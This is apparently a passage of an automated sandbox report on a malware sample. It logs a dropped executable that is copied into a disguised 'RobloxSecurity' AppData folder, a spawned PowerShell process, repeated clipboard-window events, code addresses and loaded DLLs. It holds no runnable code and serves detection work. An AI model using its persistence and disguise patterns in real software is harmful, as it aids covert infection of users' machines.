                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS (241 identical events)
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeCode function: 0_2_02B8E00C
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeCode function: 0_2_06258E50
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeCode function: 0_2_0625A268
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeCode function: 0_2_06250006
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeCode function: 0_2_06250040
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeCode function: 0_2_067EEDD1
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeCode function: 0_2_06EF04F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04F5B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04F5B471
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08803A98
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Code function: 4_2_00007FFD9B9A2B4C
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 11_2_00007FFD9B98830A
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 11_2_00007FFD9B972B4C
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 11_2_00007FFD9B989762
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 11_2_00007FFD9B987B8D
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 11_2_00007FFD9B977D15
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 18_2_00007FFD9B978B08
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 18_2_00007FFD9B9882EA
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 18_2_00007FFD9B972B4C
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 18_2_00007FFD9B989742
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 18_2_00007FFD9B987B6D
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 18_2_00007FFD9B977D59
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 42_2_00007FFD9B982B4C
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 42_2_00007FFD9B9806D1
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 42_2_00007FFD9B987D59
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 44_2_00007FFD9B962B4C
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 44_2_00007FFD9B967D59
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 45_2_00007FFD9B992B4C
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 45_2_00007FFD9B9978F5
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8072 -s 1632
Source: jqOHOuPMJP.exe, 00000000.00000002.1796380426.0000000000CF7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs jqOHOuPMJP.exe
Source: jqOHOuPMJP.exe, 00000000.00000002.1797186606.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs jqOHOuPMJP.exe
Source: jqOHOuPMJP.exe, 00000000.00000000.1644125840.0000000000946000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameLaps.exe4 vs jqOHOuPMJP.exe
Source: jqOHOuPMJP.exe, 00000000.00000002.1817862177.0000000003DAA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameHab9b84cf0be099b26b5d8bd8efac02917c.exeT vs jqOHOuPMJP.exe
Source: jqOHOuPMJP.exe	Binary or memory string: OriginalFilenameLaps.exe4 vs jqOHOuPMJP.exe
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: version.dll
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: wldp.dll
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: profapi.dll
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: propsys.dll
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: edputil.dll
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: netutils.dll
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: slc.dll
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: userenv.dll
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: sppc.dll
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: rasman.dll
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: iertutil.dll
